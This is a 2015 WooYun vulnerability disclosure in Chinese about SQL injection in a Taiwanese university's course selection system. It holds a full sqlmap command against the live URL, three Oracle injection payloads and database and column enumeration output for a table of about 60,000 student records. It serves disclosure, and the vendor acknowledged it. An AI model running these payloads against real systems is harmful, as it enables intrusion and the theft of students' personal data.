当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120776

漏洞标题:台湾某大学选课系统union based SQL注入,6万学生资料受影响,包括身分證

相关厂商:台湾國立中山大學

漏洞作者: 路人甲

提交时间:2015-06-16 09:45

修复时间:2015-08-03 23:26

公开时间:2015-08-03 23:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开

简要描述:

台湾某大学选课系统union based SQL注入,6万学生资料受影响,包括身分證

详细说明:

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --threads 2 --technique=BEUT -u "https://selcrs.nsysu.edu.tw/newstu/STU_NEW.ASP?ACTION=16" --data="CNAME=a&T_CID=A180193569&B1=%BDT%A9w%B0e%A5X" --dbs
---
Parameter: T_CID (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: CNAME=a&T_CID=A180193569' AND 9228=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9228=9228) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'lNig'='lNig&B1=%BDT%A9w%B0e%A5X
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: CNAME=a&T_CID=A180193569' AND 7332=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'uaNu'='uaNu&B1=%BDT%A9w%B0e%A5X
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: CNAME=a&T_CID=A180193569' UNION ALL SELECT CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)||CHR(120)||CHR(121)||CHR(90)||CHR(65)||CHR(104)||CHR(81)||CHR(104)||CHR(80)||CHR(90)||CHR(107)||CHR(113)||CHR(98)||CHR(122)||CHR(107)||CHR(113),NULL FROM DUAL-- &B1=%BDT%A9w%B0e%A5X
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle

漏洞证明:

available databases [14]:
[*] ACAD
[*] ACAD_6F
[*] ACAD_SH
[*] ACAY
[*] CTXSYS
[*] EXFSYS
[*] GAD
[*] MDSYS
[*] OLAPSYS
[*] PAOZ
[*] STUZ
[*] SYS
[*] SYSTEM
[*] WMSYS
current user: 'DB89957859'
current user is DBA: False
Database: ACAD
Table: STU_MAIN
[56 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| ADDR1 | VARCHAR2 |
| ADDR2 | VARCHAR2 |
| APPL_REC | VARCHAR2 |
| BIRTH_DD | VARCHAR2 |
| BIRTH_MM | VARCHAR2 |
| BIRTH_YR | VARCHAR2 |
| CHANO_COD | VARCHAR2 |
| CITY1 | VARCHAR2 |
| CITY2 | VARCHAR2 |
| CLASS_COD | VARCHAR2 |
| CNAME | VARCHAR2 |
| DEG_COD | VARCHAR2 |
| DIPLOMA_NO | VARCHAR2 |
| DPT_COD | VARCHAR2 |
| EDU_DEG | VARCHAR2 |
| EDU_MM | VARCHAR2 |
| EDU_YR | VARCHAR2 |
| EMAIL | VARCHAR2 |
| ENAME | VARCHAR2 |
| ENTER_MM | VARCHAR2 |
| ENTER_NO | VARCHAR2 |
| ENTER_SEM | VARCHAR2 |
| ENTER_YR | VARCHAR2 |
| ERNAME | VARCHAR2 |
| ERTEL_NO | VARCHAR2 |
| GRADE | VARCHAR2 |
| HONOR_ST | VARCHAR2 |
| IH_STYLE | VARCHAR2 |
| L_DPT | VARCHAR2 |
| L_EDUC_COD | VARCHAR2 |
| L_GR_MM | VARCHAR2 |
| L_GR_STAT_COD | VARCHAR2 |
| L_GR_YR | VARCHAR2 |
| L_GRADE | VARCHAR2 |
| L_SCH_COD | VARCHAR2 |
| L_SECTION | VARCHAR2 |
| NATIVE | VARCHAR2 |
| P_EMAIL | VARCHAR2 |
| PNAME | VARCHAR2 |
| POCCU | VARCHAR2 |
| PREL | VARCHAR2 |
| PTEL_NO | VARCHAR2 |
| REMARK | VARCHAR2 |
| SECTION_COD | VARCHAR2 |
| SEMS | VARCHAR2 |
| SEX | VARCHAR2 |
| SIGN_MK | VARCHAR2 |
| STAT_COD | VARCHAR2 |
| STUID | VARCHAR2 |
| TEL_NO | VARCHAR2 |
| U_EMAIL | VARCHAR2 |
| UPDAT | VARCHAR2 |
| USE_YR | VARCHAR2 |
| USERID | VARCHAR2 |
| ZIP_COD1 | VARCHAR2 |
| ZIP_COD2 | VARCHAR2 |
+---------------+----------+
Database: ACAD
+----------+---------+
| Table | Entries |
+----------+---------+
| STU_MAIN | 60748 | ====> 6万
+----------+---------+
我并未dump任何user资讯,仅仅查了下columns
为什么说也会包括身份证,因为相同系统的这个网页是用来查询身分證的
https://selcrs.nsysu.edu.tw/newstu/STU_NEW.ASP?ACTION=15

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-19 23:25

厂商回复:

感謝通報

最新状态:

暂无